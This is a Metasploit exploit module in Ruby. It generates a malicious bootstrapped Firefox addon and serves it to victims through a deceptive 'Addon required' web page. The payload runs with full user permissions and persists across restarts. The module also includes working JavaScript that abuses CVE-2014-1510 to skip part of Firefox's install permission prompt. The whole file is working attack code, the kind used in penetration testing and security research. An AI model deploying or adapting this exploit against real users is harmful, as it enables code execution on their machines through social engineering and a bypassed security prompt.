##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
      'Description'   => %q{
          This exploit dynamically creates a .xpi addon file.
        The resulting bootstrapped Firefox addon is presented to
        the victim via a web page. The victim's Firefox browser
        will pop a dialog asking if they trust the addon.

        Once the user clicks "install", the addon is installed and
        executes the payload with full user permissions. As of Firefox
        4, this will work without a restart as the addon is marked to
        be "bootstrapped". As the addon will execute the payload after
        each Firefox restart, an option can be given to automatically
        uninstall the addon once the payload has been executed.

        On Firefox 22.0 - 27.0, CVE-2014-1510 allows us to skip the
        first half of the permissions prompt.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'mihi', 'joev' ],
      'References'    =>
        [
          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ],
          [ 'CVE', '2014-1510' ], # webidl chrome:// navigation to skip first half of prompt
          [ 'CVE', '2014-1511' ]
        ],
      'DisclosureDate' => 'Jun 27 2007'
    ))
  end

  def on_request_uri(cli, request)
    if request.uri.match(/\.xpi$/i)
      # browser has navigated to the .xpi file
      print_status("Sending xpi and waiting for user to click 'accept'...")
      if not xpi = generate_addon_xpi(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
      else
        send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
      end
    else
      # initial browser request
      # force the user to access a directory-like URL
      if not request.uri.match(/\/$/)
        print_status("Redirecting request." )
        send_redirect(cli, "#{get_resource}/")
      else
        # user has navigated
        print_status("Sending response HTML." )
        send_response_html(cli, generate_html)
      end
    end

    handler(cli)
  end

  def generate_html
    %Q|
      <html><head><title>Loading, Please Wait...</title></head>
        <body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>
        <div style='visibility:hidden;width:1px;height:1px;'>
          <iframe name='f'></iframe>
        </div>
        <script>
          function install() {
            window.location.href="addon.xpi";
          }
          #{web_idl_navigation}
        </script>
        </body>
      </html>
    |
  end

  # In firefox 21 - 27, there is a vulnerability that allows navigation to a chrome:// URL.
  # From there you can load the browser XUL, and inject a data URL into a nested frame.
  # If the data URL opens the .xpi URL, the first permission prompt gets skipped.
  def web_idl_navigation
    %Q|
      try {
        c = new mozRTCPeerConnection;
        c.createOffer(function(){},function(){window.rr=window.open('chrome://browser/content/browser.xul', 'f')});
        setTimeout(function(){
          try {
            frames[0].frames[1].location="data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
                                  "{},function(){window.open('#{get_uri.chomp('/')}/addon.xpi', '_self');});<\\/script>";
          } catch(e) {
            install();
          }
        },600);
      } catch(e) {
        install();
      }
    |
  end
end